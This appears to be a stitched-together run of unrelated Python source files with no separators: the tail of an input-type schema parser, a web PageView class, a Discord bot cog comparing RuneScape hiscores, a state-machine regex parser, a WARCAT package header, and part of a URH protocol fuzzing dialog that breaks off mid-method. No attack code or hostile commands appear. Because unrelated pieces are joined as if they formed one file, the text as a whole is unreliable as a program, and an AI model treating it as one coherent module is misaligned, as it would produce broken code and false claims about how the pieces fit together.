    _substitute_ids_with_references(registry)
    return registry[root_id]


# Base types that hold a single value rather than a container of values.
SCALAR = ['Integer', 'Double', 'Bool', 'String', 'Selection', 'FileName']


def is_scalar(input_type):
    """Returns True if input_type is scalar."""
    base_type = input_type['base_type']
    return base_type in SCALAR


# A parameter string looks like "<name>": a letter followed by
# letters, digits or underscores, enclosed in angle brackets.
RE_PARAM = re.compile('^<([a-zA-Z][a-zA-Z0-9_]*)>$')


def is_param(value):
    """Determine whether given value is a parameter string.

    Returns a bool. Non-string values are never parameters.
    """
    if not isinstance(value, str):
        return False
    # Fix: the original returned the re.Match object itself (or None),
    # although the function is documented as a predicate; normalize to a
    # boolean. Truthiness is unchanged for existing callers.
    return RE_PARAM.match(value) is not None


def _substitute_ids_with_references(input_types):
    """Replaces ids or type names with python object references.

    Mutates the input_type dicts in ``input_types`` in place: wherever a
    nested type is stored as an id ('subtype', 'implementations',
    'default_descendant', record key 'type'), the id is replaced by the
    corresponding input_type dict itself.
    """
    # Rebound by the loop below; the nested helpers close over this name,
    # so each iteration they operate on the current input_type.
    input_type = {}

    def _substitute_implementations():
        """Replaces implementation ids with input_types."""
        # The resulting mapping is keyed by type *name*, not id.
        impls = {}
        for id_ in input_type['implementations']:
            type_ = input_types[id_]
            impls[type_['name']] = type_
        input_type['implementations'] = impls

    def _substitute_default_descendant():
        """Replaces default descendant id with input_type."""
        id_ = input_type.get('default_descendant', None)
        if id_ is not None:
            input_type['default_descendant'] = input_types[id_]

    def _substitute_key_type():
        """Replaces key type with input_type."""
        # pylint: disable=unused-variable, invalid-name
        for __, value in input_type['keys'].items():
            value['type'] = input_types[value['type']]

    # pylint: disable=unused-variable, invalid-name
    for __, input_type in input_types.items():
        if input_type['base_type'] == 'Array':
            input_type['subtype'] = input_types[input_type['subtype']]
        elif input_type['base_type'] == 'Abstract':
            _substitute_implementations()
            _substitute_default_descendant()
        elif input_type['base_type'] == 'Record':
            _substitute_key_type()


def _get_input_type(data):
    """Returns the input_type data structure that defines an input type
    and its constraints for validation.

    Returns None when the node carries no 'id' or 'input_type' key.
    Nested types ('subtype', 'implementations', ...) are left as ids; they
    are resolved later by _substitute_ids_with_references.
    """
    if 'id' not in data or 'input_type' not in data:
        return None

    # Fields common to every base type.
    input_type = {
        'id': data['id'],
        'base_type': data['input_type'],
        'name': data.get('name', ''),
        'full_name': data.get('full_name', ''),
        'description': data.get('description', ''),
        'attributes': data.get('attributes', {}),
    }

    base = input_type['base_type']
    if base in ('Double', 'Integer'):
        input_type.update(_parse_range(data))
    elif base == 'Array':
        input_type.update(_parse_range(data))
        # An array length can not be negative.
        input_type['min'] = max(input_type['min'], 0)
        input_type['subtype'] = data['subtype']
    elif base == 'FileName':
        input_type['file_mode'] = data['file_mode']
    elif base == 'Selection':
        input_type['values'] = _list_to_dict(data['values'], 'name')
    elif base == 'Record':
        input_type['keys'] = _list_to_dict(data['keys'])
        input_type['implements'] = data.get('implements', [])
        input_type['reducible_to_key'] = data.get('reducible_to_key', None)
    elif base == 'Abstract':
        input_type['implementations'] = data['implementations']
        input_type['default_descendant'] = data.get('default_descendant', None)
    return input_type


def _parse_range(data):
    """Parses the format range properties - min, max."""
    input_type = {}
    try:
        input_type['min'] = data['range'][0]
    except (KeyError, TypeError):  # set default value
        input_type['min'] = float('-inf')
    try:
        input_type['max'] = data['range'][1]
    except (KeyError, TypeError):  # set default value
        input_type['max'] = float('inf')
    return input_type


def _list_to_dict(list_, key_label='key'):
    """
    Transforms a list of dictionaries into a dictionary of dictionaries.

    Original dictionaries are assigned key specified in each of them
    by key_label.
    """
    dict_ = {}
    for item in list_:
        dict_[item[key_label]] = item
    return dict_


"""
Page view class
"""


import os

from Server.Importer import ImportFromModule


class PageView(ImportFromModule("Server.PageViewBase", "PageViewBase")):
    """
    Page view class.

    Configures the page (title, meta data, assets) and loads an HTML file
    named after the ``htmlToLoad`` argument from this module's directory.
    """


    # Title applied to every page rendered through this view.
    _PAGE_TITLE = "Python Web Framework"


    def __init__(self, htmlToLoad):
        """
        Constructor.
        - htmlToLoad : HTML to load (base name of a .html file located next
          to this module)
        """
        self.SetPageTitle(self._PAGE_TITLE)

        # Standard meta data: document encoding and responsive viewport.
        self.AddMetaData("charset=\"UTF-8\"")
        self.AddMetaData("name=\"viewport\" content=\"width=device-width, initial-scale=1\"")

        self.AddStyleSheet("/css/styles.css")

        self.AddJavaScript("/js/http.js")

        # Resolve the HTML file relative to this module's directory.
        self.LoadHtml(os.path.join(os.path.dirname(__file__), "%s.html" % htmlToLoad))

        self.SetPageData({ "PageTitle" : self._PAGE_TITLE })

import discord
import asyncio
import datetime
import time
import aiohttp
import threading
import glob
import re
import json
import os
import urllib.request
from discord.ext import commands
from random import randint
from random import choice as randchoice
from random import choice as rndchoice
from random import shuffle
from .utils.dataIO import fileIO
from .utils import checks
from bs4 import BeautifulSoup

class Runescapecompare:
    """Runescape-related commands"""

    # Hiscore API endpoints:
    #   ironman: http://services.runescape.com/m=hiscore_ironman/index_lite.ws?player=
    #   normal:  http://services.runescape.com/m=hiscore/index_lite.ws?player=

    def __init__(self, bot):
        self.bot = bot

    @commands.group(name="compare", pass_context=True)
    async def _compare(self, ctx):
        """Command group; prompts the user when no subcommand is given."""
        if ctx.invoked_subcommand is None:
            await self.bot.say("Please, choose a skill to compare!")

    #####Overall#####
    @_compare.command(name="overall", pass_context=True)
    async def compare_overall(self, ctx, name1 : str, name2 : str):
        """Compare the overall hiscore entry (rank, level, xp) of two players.

        Fetches each player's lite hiscore dump; the first line holds the
        comma-separated "overall" triple: rank,level,xp.
        """
        address1 = "http://services.runescape.com/m=hiscore_ironman/index_lite.ws?player=" + name1
        address2 = "http://services.runescape.com/m=hiscore_ironman/index_lite.ws?player=" + name2

        try:
            website1 = urllib.request.urlopen(address1)
            website2 = urllib.request.urlopen(address2)
            website_html1 = website1.read().decode(website1.headers.get_content_charset())
            website_html2 = website2.read().decode(website2.headers.get_content_charset())
            stats1 = website_html1.split("\n")
            stats2 = website_html2.split("\n")
            stat1 = stats1[0].split(",")
            stat2 = stats2[0].split(",")
            # BUG FIX: the hiscore fields arrive as strings. The original
            # compared them lexicographically and, in the second branch,
            # subtracted raw strings (a TypeError silently swallowed by the
            # bare except). Convert everything to int once, up front.
            rank1, lvl1, xp1 = int(stat1[0]), int(stat1[1]), int(stat1[2])
            rank2, lvl2, xp2 = int(stat2[0]), int(stat2[1]), int(stat2[2])
            if xp1 > xp2:
                # Lower rank number is better, hence rank2 - rank1.
                comparerank = rank2 - rank1
                comparelvl = lvl1 - lvl2
                comparexp = xp1 - xp2
                await self.bot.say("```" + name1 + "'s ranking is " + str(comparerank) + " ranks higher than " + name2 + "'s rank.\n" + name1 + "'s level is " + str(comparelvl) + " levels higher than " + name2 + "'s.\n" + name1 + "'s total experience is " + str(comparexp) + " higher than " + name2 + "'s.```")
            if xp2 > xp1:
                comparerank = rank1 - rank2
                comparelvl = lvl2 - lvl1
                comparexp = xp2 - xp1
                await self.bot.say("```" + name2 + "'s ranking is " + str(comparerank) + " ranks higher than " + name1 + "'s rank.\n" + name2 + "'s level is " + str(comparelvl) + " levels higher than " + name1 + "'s.\n" + name2 + "'s total experience is " + str(comparexp) + " higher than " + name1 + "'s.```")
        except Exception:
            # Best-effort: network failures, unknown players (HTTP 404) and
            # parse errors all fall through to one user-facing message.
            await self.bot.say("Sorry... Something went wrong there. Did you type the name correctly?")
            
def setup(bot):
    """Entry point used by the bot loader to register this cog."""
    bot.add_cog(Runescapecompare(bot))


import string

import ast
from state_machine import PSM, Source



class SpecialPattern:
    """Character tables shared by the regex-parsing states below."""

    # Escapes that denote one literal character: \t, \n, \v, \f, \r, \0.
    individual_chars = ('t', 'n', 'v', 'f', 'r', '0')
    # Escapes that denote a character category: \d, \D, \w, \W, \s, \S.
    range_chars = ('d', 'D', 'w', 'W', 's', 'S')

    # Metacharacters that must be escaped to be matched literally.
    # Fix: the original listed '.' twice; harmless for membership tests
    # but redundant, so it is listed once here.
    special_chars = ('^', '$', '[', ']', '(', ')', '{', '}', '\\', '.', '*',
                     '?', '+', '|')
    # Subset that needs escaping inside a character class.
    restrict_special_chars = ('\\', '[', ']')

    # Names accepted in a [:class:] construct (POSIX classes plus d/w/s).
    posix_classes = ("alnum", "alpha", "blank", "cntrl", "digit", "graph",
                     "lower", "print", "punct", "space", "upper", "xdigit",
                     "d", "w", "s")
    min_len_posix_class = 1


#-------------------------------------
# Group

class WrappedGroup:
    """Builder around an ``ast.Group`` that also tracks alternation state."""
    def __init__(self):
        self.group = ast.Group()
        self.is_alt = False  # becomes True once a "|" converts the group

    def add(self, other):
        # In alternation mode, append to the last alternative branch
        # (tuples are immutable, so the branch is rebuilt); otherwise
        # extend the group's plain sequence.
        if self.is_alt:
            last_alt = self.alt.parts[-1] + (other,)
            self.alt.parts = self.alt.parts[:-1] + (last_alt,)
        else:
            self.group.seq = self.group.seq + (other,)

    @property
    def alt(self) -> ast.Alternative:
        # Only valid in alternation mode, where the group's sequence holds
        # exactly one ast.Alternative (see collapse_alt).
        assert self.is_alt
        return self.group.seq[0]

    def collapse_alt(self):
        # Called when a "|" is read: open a new, empty alternative branch.
        if self.is_alt:
            self.alt.parts = self.alt.parts + ((),)
        else:
            # First "|": the existing sequence becomes the first branch of
            # a fresh ast.Alternative that replaces the whole sequence.
            self.is_alt = True
            first_alt_elems = self.group.seq
            self.group.seq = (ast.Alternative(),)
            self.alt.parts = (first_alt_elems,())


class OpeningOfGroup:
    """State entered right after a "(" (or at the start of the expression).

    Decides between a group-option prefix ("?"), a nested group, the end
    of the group, or ordinary content.
    """
    def __init__(self, parent: None, initial: bool=False):
        self.is_initial = initial
        self.parent = parent  # OpeningOfGroup or ContentOfGroup
        self.g = WrappedGroup()
        self.content_of_initial = None

        # forward of function
        self.add = self.g.add

        # if this group is the initial, there is no parent but we must refer
        # to itself as the returning state
        # but if it is a nested group, it must be added into its global group
        if self.is_initial:
            self.content_of_initial = ContentOfGroup(self, initial)
        else:
            self.parent.add(self.g.group)

    def next(self, psm: PSM):
        if not self.is_initial and psm.char == "?":
            # "(?" introduces the option character (":", "!", "=", "<")
            return FirstOptionOfGroup(self)
        elif psm.char == ")":
            if self.is_initial:
                psm.error = 'unexpected ")"'
            else:
                return self.parent
        elif psm.char == "(":
            return OpeningOfGroup(self)
        elif self.is_initial:
            # the top-level state delegates ordinary characters to its one
            # persistent content state
            return self.content_of_initial.next(psm)
        else:
            t = ContentOfGroup(self)
            return t.next(psm)


class FirstOptionOfGroup:
    """State after "(?": reads the option character of the group."""
    def __init__(self, parent: OpeningOfGroup):
        self.parent = parent

    def next(self, psm: PSM):
        if psm.char == ":":
            # "(?:" -> non-capturing group
            self.parent.g.group.ignored = True
            return ContentOfGroup(self.parent)
        elif psm.char == "!":
            # "(?!" -> negative lookahead ("lookhead" is the ast's spelling)
            self.parent.g.group.lookhead = ast.Group.NegativeLookhead
            return ContentOfGroup(self.parent)
        elif psm.char == "=":
            # "(?=" -> positive lookahead
            self.parent.g.group.lookhead = ast.Group.PositiveLookhead
            return ContentOfGroup(self.parent)
        elif psm.char == "<":
            # "(?<" -> named group; the name is accumulated by NameOfGroup
            self.parent.g.group.name = ""
            return NameOfGroup(self.parent)
        else:
            psm.error = 'expected ":", "!", "<" or "="'


class NameOfGroup:
    """Accumulates the identifier of a named group, ``(?<name>``."""

    def __init__(self, parent: OpeningOfGroup):
        self.parent = parent

    def next(self, psm: PSM):
        char = psm.char
        if char == ">":
            # name complete, resume the enclosing group
            return self.parent
        if char.isalpha() or char == "_":
            self.parent.g.group.name += char
            return self
        psm.error = 'expected a letter, "_" or ">"'


class ContentOfGroup:
    """State that consumes the body of a group (or the whole expression).

    Remembers whether the previous token was quantified, so that a
    following "?" means "ungreedy" and a second quantifier is rejected.
    """
    # Quantification states for the most recently consumed token.
    NotQuantified = 0
    Quantified = 1
    UngreedyQuantified = 2

    def __init__(self, parent: OpeningOfGroup, initial: bool=False):
        self.parent = parent
        self.is_initial = initial
        # State returned after each consumed token: the initial (top-level)
        # content state hands control back to its OpeningOfGroup, a nested
        # one loops on itself.
        self.limited_prev = parent if initial else self
        self.quantified = ContentOfGroup.NotQuantified

        # forward of function
        self.add = self.parent.add

    def next(self, psm: PSM):
        # Consume the remembered quantification state; it is re-set below
        # only by the quantifier branches.
        quantified = self.quantified
        self.quantified = ContentOfGroup.NotQuantified

        if psm.char == ")":
            if self.is_initial:
                psm.error = "unbalanced parenthesis"
            else:
                return self.parent.parent

        elif psm.char == "(":
            return OpeningOfGroup(self.limited_prev)

        elif psm.char == "^":
            self.add(ast.MatchBegin())
            return self.limited_prev

        elif psm.char == "$":
            self.add(ast.MatchEnd())
            return self.limited_prev

        elif psm.char == ".":
            # "." is stored as a pattern char, not a literal
            t = ast.PatternChar()
            t.pattern = psm.char
            self.add(t)
            return self.limited_prev

        elif psm.char == "\\":
            return EscapedChar(self.limited_prev,
                               as_single_chars=SpecialPattern.special_chars)

        elif psm.char == "[":
            return CharClass(self.limited_prev)

        elif psm.char == "|":
            self.parent.g.collapse_alt()
            return self.limited_prev

        # >>> Quantifiers
        elif psm.char == "?" and quantified == ContentOfGroup.NotQuantified:
            self.quantified = ContentOfGroup.Quantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = ast.NoneOrOnce()
            return self.limited_prev

        elif psm.char == "*" and quantified == ContentOfGroup.NotQuantified:
            self.quantified = ContentOfGroup.Quantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = ast.NoneOrMore()
            return self.limited_prev

        elif psm.char == "+" and quantified == ContentOfGroup.NotQuantified:
            self.quantified = ContentOfGroup.Quantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = ast.OneOrMore()
            return self.limited_prev

        elif psm.char == "{" and quantified == ContentOfGroup.NotQuantified:
            # "{m,n}": the Between quantifier is attached now and filled in
            # by the Minimum/MaximumOfRepetition states.
            self.quantified = ContentOfGroup.Quantified
            t = MinimumOfRepetition(self.limited_prev)
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = t.between
            return t

        elif psm.char == "?" and quantified == ContentOfGroup.Quantified:
            # "?" directly after a quantifier makes it ungreedy
            self.quantified = ContentOfGroup.UngreedyQuantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier.greedy = False
            return self.limited_prev

        elif quantified == ContentOfGroup.Quantified:
            psm.error = "unexpected quantifier"

        elif quantified == ContentOfGroup.UngreedyQuantified:
            psm.error = "quantifier repeated"
        # <<< Quantifier

        else:
            # any other character is a literal
            t = ast.SingleChar()
            t.char = psm.char
            self.add(t)
            return self.limited_prev

    def _last_or_fail(self, psm: PSM):
        """Return the last token of the group, or set an error if empty."""
        if self.parent.g.group.seq:
            return self.parent.g.group.seq[-1]
        else:
            psm.error = "nothing to repeat"


class MinimumOfRepetition:
    """State inside "{": accumulates the digits of the minimum count."""
    def __init__(self, parent: ContentOfGroup):
        self.parent = parent
        # Quantifier node; already attached to the repeated token by
        # ContentOfGroup before this state runs.
        self.between = ast.Between()
        self.min = []  # digit characters of the minimum, in order

    def next(self, psm: PSM):
        if psm.char.isdigit():
            self.min.append(psm.char)
            return self
        elif psm.char == ",":
            # "{m," -> continue with the maximum part
            self._interpret()
            return MaximumOfRepetition(self)
        elif psm.char == "}":
            # "{m}" -> only a minimum was given
            self._interpret()
            return self.parent
        else:
            psm.error = 'expected digit, "," or "}"'

    def _interpret(self):
        """Convert accumulated digits into ``between.min`` (if any)."""
        if not self.min:
            return

        try:
            count = int("".join(self.min))
        except ValueError:
            # digits-only input cannot fail int(); guard kept as invariant
            assert False, "internal error: cannot convert to number minimum of repetition"
        self.between.min = count


class MaximumOfRepetition:
    """State after "{m,": accumulates the digits of the maximum count."""
    def __init__(self, repeat: MinimumOfRepetition):
        self.repeat = repeat
        self.max = []  # digit characters of the maximum, in order

    def next(self, psm: PSM):
        if psm.char.isdigit():
            self.max.append(psm.char)
            return self
        elif psm.char == "}":
            # quantifier finished; resume the enclosing group content
            self._interpret()
            return self.repeat.parent
        else:
            psm.error = 'expected digit, "," or "}"'

    def _interpret(self):
        """Convert accumulated digits into ``between.max`` (if any)."""
        if not self.max:
            return

        try:
            count = int("".join(self.max))
        except ValueError:
            # digits-only input cannot fail int(); guard kept as invariant
            assert False, "internal error: cannot convert to number maximum of repetition"
        self.repeat.between.max = count


#--------------------------------------
# Escaping

class EscapedChar:
    """State after a backslash (in group or character-class context).

    ``as_single_chars`` / ``as_pattern_chars`` configure which characters
    may legally be escaped in the calling context.
    """
    def __init__(self, prev, as_single_chars=(), as_pattern_chars=()):
        self.prev = prev  # ContentOfGroup or CharClass
        self.single_chars = as_single_chars
        self.pattern_chars = as_pattern_chars

    def next(self, psm: PSM):
        if psm.char in SpecialPattern.individual_chars \
           or psm.char in SpecialPattern.range_chars \
           or psm.char in self.pattern_chars:
            # \n, \d, ... -> pattern-character node
            t = ast.PatternChar()
            t.pattern = psm.char
            self.prev.add(t)
            return self.prev
        elif psm.char in self.single_chars:
            # escaped metacharacter -> literal character node
            t = ast.SingleChar()
            t.char = psm.char
            self.prev.add(t)
            return self.prev
        elif psm.char == "x":
            return AsciiChar(self.prev)  # \xHH
        elif psm.char == "u":
            return UnicodeChar(self.prev)  # \uHHHH
        else:
            psm.error = "unauthorized escape of {}".format(psm.char)


class AsciiChar:
    """State consuming the two hex digits of a ``\\xHH`` escape.

    The PatternChar node is registered with the owner immediately and its
    ``pattern`` string is filled in digit by digit.
    """
    def __init__(self, prev):
        self.prev = prev  # ContentOfGroup or CharClass
        self.pattern = ast.PatternChar()
        self.pattern.type = ast.PatternChar.Ascii
        self.prev.add(self.pattern)

    def next(self, psm: PSM):
        if psm.char not in string.hexdigits:
            psm.error = "expected ASCII hexadecimal character"
            return
        self.pattern.pattern += psm.char
        # two hex digits complete the escape
        if len(self.pattern.pattern) >= 2:
            return self.prev
        return self


class UnicodeChar:
    """State consuming the four hex digits of a ``\\uHHHH`` escape.

    The PatternChar node is registered with the owner immediately and its
    ``pattern`` string is filled in digit by digit.
    """
    def __init__(self, prev):
        self.prev = prev  # ContentOfGroup or CharClass
        self.pattern = ast.PatternChar()
        self.pattern.type = ast.PatternChar.Unicode
        self.prev.add(self.pattern)

    def next(self, psm: PSM):
        if psm.char not in string.hexdigits:
            psm.error = "expected ASCII hexadecimal character"
            return
        self.pattern.pattern += psm.char
        # four hex digits complete the escape
        if len(self.pattern.pattern) >= 4:
            return self.prev
        return self


#-------------------------------------
# Character class

class WrappedCharClass:
    """Mutable wrapper around an ``ast.CharClass`` under construction."""

    def __init__(self):
        # ast is CharClass or may be changed to PatternClass in one case
        self.ast = ast.CharClass()

    def add(self, other):
        """Append one element, keeping ``elems`` a tuple."""
        assert isinstance(self.ast, ast.CharClass)
        self.ast.elems += (other,)

    def pop(self):
        """Remove and return the most recently added element."""
        assert isinstance(self.ast, ast.CharClass)
        *head, tail = self.ast.elems
        self.ast.elems = tuple(head)
        return tail


class CharClass:
    """State inside "[...]": builds a character class.

    Tracks pending range construction ("a-z"), the special meaning of a
    leading "^", and whether the finished class may still be reinterpreted
    as a POSIX-like class ("[:digit:]").
    """
    def __init__(self, prev):
        self.prev = prev  # ContentOfGroup or CharClass
        self.q = WrappedCharClass()

        # forward function
        self.add = self.q.add

        self.next_is_range = False  # a "-" was just seen after an element
        self.empty = True           # no character consumed yet
        self.can_mutate = True      # POSIX reinterpretation still possible

    def next(self, psm: PSM):
        # Consume the one-shot flags; re-set below where appropriate.
        this_should_be_range = self.next_is_range
        self.next_is_range = False

        this_is_empty = self.empty
        self.empty = False

        if psm.char == "\\":
            # An escape can never be part of a POSIX class name.
            self.can_mutate = False
            self.next_is_range = this_should_be_range

            return EscapedChar(self,
                               as_single_chars=SpecialPattern.restrict_special_chars)

        elif this_should_be_range and psm.char != "]":
            # Close the pending range: pop its start, pair it with this char.
            assert isinstance(self.q.ast, ast.CharClass)
            assert len(self.q.ast.elems) >= 1
            self.next_is_range = False
            t = ast.Range()
            t.begin = self.q.pop()
            t.end = ast.SingleChar()
            t.end.char = psm.char
            self.q.add(t)
            return self

        elif psm.char == "^":
            # if at the begining, it has a special meaning
            if this_is_empty:
                self.can_mutate = False
                self.q.ast.negate = True
            else:
                t = ast.SingleChar()
                t.char = psm.char
                self.q.add(t)
            return self

        elif psm.char == "]":
            if this_should_be_range:
                # trailing "-" before "]" is a literal dash
                t = ast.SingleChar()
                t.char = "-"
                self.q.add(t)
            else:
                self.mutate_if_posix_like()

            self.prev.add(self.q.ast)
            return self.prev

        elif psm.char == "[":
            # nested character class
            return CharClass(self)

        elif psm.char == "-" and len(self.q.ast.elems) >= 1:
            # "-" after at least one element starts a potential range
            self.next_is_range = True
            return self

        else:
            t = ast.SingleChar()
            t.char = psm.char
            self.q.add(t)
            return self

    def mutate_if_posix_like(self):
        """
        Change from character class to pattern char if the content is matching
        POSIX-like classe.
        """
        assert isinstance(self.q.ast, ast.CharClass)

        # put in this variable everything that had happen but not saved into
        # the single char object
        # because mutation is only possible if the exact string of the content
        # match a pre-definied list, so if an unlogged char is consumed, it
        # must prevent mutation
        if not self.can_mutate:
            return

        # need at least ":", one name character, ":"
        if len(self.q.ast.elems) < SpecialPattern.min_len_posix_class + 2:
            return

        opening = self.q.ast.elems[0]
        if not isinstance(opening, ast.SingleChar) or opening.char != ":":
            return

        closing = self.q.ast.elems[-1]
        if not isinstance(closing, ast.SingleChar) or closing.char != ":":
            return

        # everything between the colons must be plain letters
        is_only_ascii = lambda x: (isinstance(x, ast.SingleChar)
                                   and len(x.char) == 1
                                   and x.char.isalpha())
        class_may_be_a_word = not any(
            not is_only_ascii(x) for x in self.q.ast.elems[1:-1])
        if not class_may_be_a_word:
            return

        word = "".join(s.char for s in self.q.ast.elems[1:-1])
        if word not in SpecialPattern.posix_classes:
            return

        # replace the whole class with a single POSIX pattern char
        t = ast.PatternChar()
        t.pattern = word
        t.type = ast.PatternChar.Posix
        self.q.ast = t


#-------------------------------------
def parse(expr, **kw):
    """Parse the regex string *expr* and return the root ``ast.Group``.

    Optional keyword arguments ``pre_action`` / ``post_action`` are
    forwarded to the state machine as per-step callbacks.
    """
    sm = PSM()
    sm.source = Source(expr)
    # the initial state is a synthetic top-level group with no parent
    sm.starts_with(OpeningOfGroup(parent=None, initial=True))
    sm.pre_action = kw.get("pre_action", None)
    sm.post_action = kw.get("post_action", None)
    sm.parse()
    return sm.state.g.group

'''WARCAT: Web ARChive (WARC) Archiving Tool

Tool and library for handling Web ARChive (WARC) files.
'''

from .version import *

import math

from PyQt5.QtCore import Qt, pyqtSlot
from PyQt5.QtGui import QCloseEvent
from PyQt5.QtWidgets import QDialog, QInputDialog

from urh import settings
from urh.models.FuzzingTableModel import FuzzingTableModel
from urh.signalprocessing.ProtocoLabel import ProtocolLabel
from urh.signalprocessing.ProtocolAnalyzerContainer import ProtocolAnalyzerContainer
from urh.ui.ui_fuzzing import Ui_FuzzingDialog


class FuzzingDialog(QDialog):
    """Dialog for editing the fuzzing values of a protocol label.

    The user picks a message and one of its labels, adjusts the fuzzed
    range, and fills the value table either row by row or in bulk via
    range, boundary, or random strategies (see on_btn_add_fuzzing_values_clicked).
    """

    def __init__(self, protocol: ProtocolAnalyzerContainer, label_index: int, msg_index: int, proto_view: int,
                 parent=None):
        """Build the UI for the given protocol/message/label selection.

        :param protocol: container whose messages carry the labels to fuzz
        :param label_index: initially selected label in the combo box
        :param msg_index: initially shown message; -1 falls back to 0
        :param proto_view: data view: 0 = bits, 1 = hex, 2 = ascii (see message_data)
        """
        super().__init__(parent)
        self.ui = Ui_FuzzingDialog()
        self.ui.setupUi(self)
        self.setAttribute(Qt.WA_DeleteOnClose)
        self.setWindowFlags(Qt.Window)

        self.protocol = protocol
        msg_index = msg_index if msg_index != -1 else 0
        # The message spin box is 1-based in the UI, 0-based internally.
        self.ui.spinBoxFuzzMessage.setValue(msg_index + 1)
        self.ui.spinBoxFuzzMessage.setMinimum(1)
        self.ui.spinBoxFuzzMessage.setMaximum(self.protocol.num_messages)

        self.ui.comboBoxFuzzingLabel.addItems([l.name for l in self.message.message_type])
        self.ui.comboBoxFuzzingLabel.setCurrentIndex(label_index)

        self.proto_view = proto_view
        self.fuzz_table_model = FuzzingTableModel(self.current_label, proto_view)
        self.fuzz_table_model.remove_duplicates = self.ui.chkBRemoveDuplicates.isChecked()
        self.ui.tblFuzzingValues.setModel(self.fuzz_table_model)
        self.fuzz_table_model.update()

        # Start/end spin boxes are 1-based/inclusive in the UI.
        self.ui.spinBoxFuzzingStart.setValue(self.current_label_start + 1)
        self.ui.spinBoxFuzzingEnd.setValue(self.current_label_end)
        self.ui.spinBoxFuzzingStart.setMaximum(len(self.message_data))
        self.ui.spinBoxFuzzingEnd.setMaximum(len(self.message_data))

        self.update_message_data_string()
        self.ui.tblFuzzingValues.resize_me()

        self.create_connects()
        # Restore the geometry persisted by closeEvent.
        self.restoreGeometry(settings.read("{}/geometry".format(self.__class__.__name__), type=bytes))

    @property
    def message(self):
        """Currently selected message (spin box value is 1-based)."""
        return self.protocol.messages[int(self.ui.spinBoxFuzzMessage.value() - 1)]

    @property
    def current_label_index(self):
        """Index of the selected label in the combo box."""
        return self.ui.comboBoxFuzzingLabel.currentIndex()

    @property
    def current_label(self) -> ProtocolLabel:
        """Selected label, or None if the message type has no labels.

        NOTE: this property has side effects — it replaces the label in the
        message type with a copy, strips empty fuzz values, and ensures at
        least one fuzz value (the label's current bits) is present.
        """
        if len(self.message.message_type) == 0:
            return None

        cur_label = self.message.message_type[self.current_label_index].get_copy()
        self.message.message_type[self.current_label_index] = cur_label
        cur_label.fuzz_values = [fv for fv in cur_label.fuzz_values if fv]  # Remove empty strings

        if len(cur_label.fuzz_values) == 0:
            cur_label.fuzz_values.append(self.message.plain_bits_str[cur_label.start:cur_label.end])
        return cur_label

    @property
    def current_label_start(self):
        """Label start index in the current proto view, or -1 if unavailable."""
        if self.current_label and self.message:
            return self.message.get_label_range(self.current_label, self.proto_view, False)[0]
        else:
            return -1

    @property
    def current_label_end(self):
        """Label end index in the current proto view, or -1 if unavailable."""
        if self.current_label and self.message:
            return self.message.get_label_range(self.current_label, self.proto_view, False)[1]
        else:
            return -1

    @property
    def message_data(self):
        """Message payload as string in the active view (bit/hex/ascii)."""
        if self.proto_view == 0:
            return self.message.plain_bits_str
        elif self.proto_view == 1:
            return self.message.plain_hex_str
        elif self.proto_view == 2:
            return self.message.plain_ascii_str
        else:
            return None

    def create_connects(self):
        """Wire all UI signals to their slots (called once from __init__)."""
        self.ui.spinBoxFuzzingStart.valueChanged.connect(self.on_fuzzing_start_changed)
        self.ui.spinBoxFuzzingEnd.valueChanged.connect(self.on_fuzzing_end_changed)
        self.ui.comboBoxFuzzingLabel.currentIndexChanged.connect(self.on_combo_box_fuzzing_label_current_index_changed)
        self.ui.btnRepeatValues.clicked.connect(self.on_btn_repeat_values_clicked)
        self.ui.btnAddRow.clicked.connect(self.on_btn_add_row_clicked)
        self.ui.btnDelRow.clicked.connect(self.on_btn_del_row_clicked)
        self.ui.tblFuzzingValues.deletion_wanted.connect(self.delete_lines)
        self.ui.chkBRemoveDuplicates.stateChanged.connect(self.on_remove_duplicates_state_changed)
        self.ui.sBAddRangeStart.valueChanged.connect(self.on_fuzzing_range_start_changed)
        self.ui.sBAddRangeEnd.valueChanged.connect(self.on_fuzzing_range_end_changed)
        self.ui.checkBoxLowerBound.stateChanged.connect(self.on_lower_bound_checked_changed)
        self.ui.checkBoxUpperBound.stateChanged.connect(self.on_upper_bound_checked_changed)
        self.ui.spinBoxLowerBound.valueChanged.connect(self.on_lower_bound_changed)
        self.ui.spinBoxUpperBound.valueChanged.connect(self.on_upper_bound_changed)
        self.ui.spinBoxRandomMinimum.valueChanged.connect(self.on_random_range_min_changed)
        self.ui.spinBoxRandomMaximum.valueChanged.connect(self.on_random_range_max_changed)
        self.ui.spinBoxFuzzMessage.valueChanged.connect(self.on_fuzz_msg_changed)
        self.ui.btnAddFuzzingValues.clicked.connect(self.on_btn_add_fuzzing_values_clicked)
        self.ui.comboBoxFuzzingLabel.editTextChanged.connect(self.set_current_label_name)

    def update_message_data_string(self):
        """Refresh the pre/fuzzed/post bit preview labels around the label range.

        Shows up to num_proto_bits of context on each side and truncates the
        fuzzed section after num_fuz_bits, marking cut-offs with ellipses.
        """
        fuz_start = self.current_label_start
        fuz_end = self.current_label_end
        num_proto_bits = 10
        num_fuz_bits = 16

        proto_start = fuz_start - num_proto_bits
        preambel = "... "
        if proto_start <= 0:
            proto_start = 0
            preambel = ""

        proto_end = fuz_end + num_proto_bits
        postambel = " ..."
        if proto_end >= len(self.message_data) - 1:
            proto_end = len(self.message_data) - 1
            postambel = ""

        fuzamble = ""
        if fuz_end - fuz_start > num_fuz_bits:
            fuz_end = fuz_start + num_fuz_bits
            fuzamble = "..."

        self.ui.lPreBits.setText(preambel + self.message_data[proto_start:self.current_label_start])
        self.ui.lFuzzedBits.setText(self.message_data[fuz_start:fuz_end] + fuzamble)
        self.ui.lPostBits.setText(self.message_data[self.current_label_end:proto_end] + postambel)
        self.set_add_spinboxes_maximum_on_label_change()

    def closeEvent(self, event: QCloseEvent):
        """Persist window geometry before closing."""
        settings.write("{}/geometry".format(self.__class__.__name__), self.saveGeometry())
        super().closeEvent(event)

    @pyqtSlot(int)
    def on_fuzzing_start_changed(self, value: int):
        """Move the label start to the new (1-based) position; clears fuzz values."""
        self.ui.spinBoxFuzzingEnd.setMinimum(self.ui.spinBoxFuzzingStart.value())
        # Convert from the displayed view index back to a bit index.
        new_start = self.message.convert_index(value - 1, self.proto_view, 0, False)[0]
        self.current_label.start = new_start
        self.current_label.fuzz_values[:] = []
